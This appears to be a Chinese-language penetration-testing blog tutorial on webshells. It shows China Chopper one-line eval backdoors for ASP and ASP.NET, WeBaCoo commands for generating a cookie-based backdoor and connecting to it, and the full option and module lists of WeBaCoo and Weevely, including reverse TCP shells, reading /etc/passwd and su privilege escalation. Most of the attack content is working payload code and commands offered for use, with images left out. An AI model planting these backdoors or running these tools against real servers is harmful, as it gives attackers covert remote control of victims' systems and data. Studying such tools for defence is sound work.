web 渗透 --- webshell

目录

一、中国菜刀

1.一句话木马

2.将一句话木马上传至目标

3.使用菜刀连接webshell

4.菜刀功能展示

二、 WeBaCoo (Web Backdoor Cookie)

1.简介

2.生成服务器端

3.上传至目标

4.连接webshell

5.抓包分析流量(cookie传输)

三、Weevely

1.简介

2.生成webshell,并上传

3.连接webshell

4.help展示所模块

5.流量分析(referer传输)


一、中国菜刀

1.一句话木马

PHP:  
ASP: <%eval request("pass")%> 
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

2.将一句话木马上传至目标

3.使用菜刀连接webshell

web 渗透 --- webshell_第1张图片

4.菜刀功能展示

web 渗透 --- webshell_第2张图片

二、 WeBaCoo (Web Backdoor Cookie)

1.简介

  • 类终端的shell,只针对 PHP
  • 编码通信内容通过 cookie 头传输,隐蔽性较强
  • Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~ cm:bash64 编码之后的命令
  • cn:服务器用于返回数据的 cookie 头的名
  • cp:返回信息定界符

2.生成服务器端

  • webacoo -g -o webacoo.php
    -g     Generate backdoor code (-o is required)
    
    -o     OUTPUT Generated backdoor output filename 

    web 渗透 --- webshell_第3张图片

3.上传至目标

 

4.连接webshell

  • webacoo -t -u http://10.10.10.132/webacoo.php
-t    Establish remote "terminal" connection (-u is required)

-u    URL Backdoor URL 

web 渗透 --- webshell_第4张图片

5.抓包分析流量(cookie传输)

web 渗透 --- webshell_第5张图片

  • 解码

  • 其他参数
root@kali:~# webacoo -h

	WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
	Copyright (C) 2011-2012 Anestis Bechtsoudis
	{ @anestisb | [email protected] | http(s)://bechtsoudis.com }


Usage: webacoo [options]

Options:
  -g		Generate backdoor code (-o is required)

  -f FUNCTION	PHP System function to use
	FUNCTION
		1: system 	(default)
		2: shell_exec
		3: exec
		4: passthru
		5: popen

  -o OUTPUT	Generated backdoor output filename

  -r 		Return un-obfuscated backdoor code

  -t		Establish remote "terminal" connection (-u is required)

  -u URL	Backdoor URL

  -e CMD	Single command execution mode (-t and -u are required)

  -m METHOD	HTTP method to be used (default is GET)

  -c C_NAME	Cookie name (default: "M-cookie")

  -d DELIM	Delimiter (default: New random for each request)

  -a AGENT	HTTP header user-agent (default exist)

  -p PROXY	Use proxy (tor, ip:port or user:pass:ip:port)

  -v LEVEL	Verbose level
	LEVEL
		0: no additional info (default)
		1: print HTTP headers
		2: print HTTP headers + data

  -l LOG	Log activity to file

  -h		Display help and exit

  update	Check for updates and apply if any

三、Weevely

1.简介

隐蔽的终端 PHP Webshell,只针对 PHP

30 多个管理模块

  1. 执行系统命令
  2. 检查服务器常见配置错误
  3. 创建正向、反向 TCP Shell 连接
  4. 通过目标计算机代理iHTTP 流量
  5. 从目标计算机运行端口扫描,渗透内网

支持连接密码

2.生成webshell,并上传

3.连接webshell

web 渗透 --- webshell_第6张图片

4.help展示所模块


 :audit_filesystem     Audit system files for wrong permissions.                            
 :audit_phpconf        Audit PHP configuration.                                             
 :audit_etcpasswd      Get /etc/passwd with different techniques.                           
 :audit_suidsgid       Find files with SUID or SGID flags.                                  
 :shell_su             Elevate privileges with su command.                                  
 :shell_php            Execute PHP commands.                                                
 :shell_sh             Execute Shell commands.                                              
 :system_extensions    Collect PHP and webserver extension list.                            
 :system_info          Collect system information.                                          
 :backdoor_reversetcp  Execute a reverse TCP shell.                                         
 :backdoor_tcp         Spawn a shell on a TCP port.                                         
 :bruteforce_sql       Bruteforce SQL database.                                             
 :file_webdownload     Download URL to the filesystem                                       
 :file_download        Download file to remote filesystem.                                  
 :file_rm              Remove remote file.                                                  
 :file_upload          Upload file to remote filesystem.                                    
 :file_grep            Print lines matching a pattern in multiple files.                    
 :file_bzip2           Compress or expand bzip2 files.                                      
 :file_cp              Copy single file.                                                    
 :file_tar             Compress or expand tar archives.                                     
 :file_cd              Change current working directory.                                    
 :file_zip             Compress or expand zip files.                                        
 :file_ls              List directory content.                                              
 :file_gzip            Compress or expand gzip files.                                       
 :file_upload2web      Upload file automatically to a web folder and get corresponding URL. 
 :file_edit            Edit remote file on a local editor.                                  
 :file_read            Read remote file from the remote filesystem.                         
 :file_touch           Change file timestamp.                                               
 :file_check           Get remote file information.                                         
 :file_find            Find files with given names and attributes.                          
 :file_mount           Mount remote filesystem using HTTPfs.                                
 :file_enum            Check existence and permissions of a list of paths.                  
 :sql_dump             Multi dbms mysqldump replacement.                                    
 :sql_console          Execute SQL query or run console.                                    
 :net_ifconfig         Get network interfaces addresses.                                    
 :net_scan             TCP Port scan.                                                       
 :net_curl             Perform a curl-like HTTP request.                                    
 :net_proxy            Proxify local HTTP traffic passing through the target.               
 :net_phpproxy         Install PHP proxy on the target.                                     

web 渗透 --- webshell_第7张图片

5.流量分析(referer传输)

web 渗透 --- webshell_第8张图片

 

 

 

你可能感兴趣的:(web,渗透)